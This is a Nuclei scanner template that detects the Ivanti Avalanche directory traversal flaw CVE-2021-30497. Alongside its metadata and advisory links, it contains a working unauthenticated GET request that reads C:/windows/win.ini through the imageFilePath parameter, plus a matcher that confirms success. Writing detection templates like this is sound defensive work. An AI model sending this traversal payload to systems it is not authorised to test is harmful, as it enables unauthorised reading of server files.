nuclei-templates/cves/2021/CVE-2021-30497.yaml

33 lines
1.0 KiB
YAML

id: CVE-2021-30497
info:
name: Ivanti Avalanche Directory Traversal
author: gy741
severity: high
description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
reference:
- https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
- https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US
- https://help.ivanti.com/wl/help/en_us/aod/5.4/Avalanche/Console/Launching_the_Avalanche.htm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-30497
tags: cve,cve2021,avalanche,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "for 16-bit app support"
- type: status
status:
- 200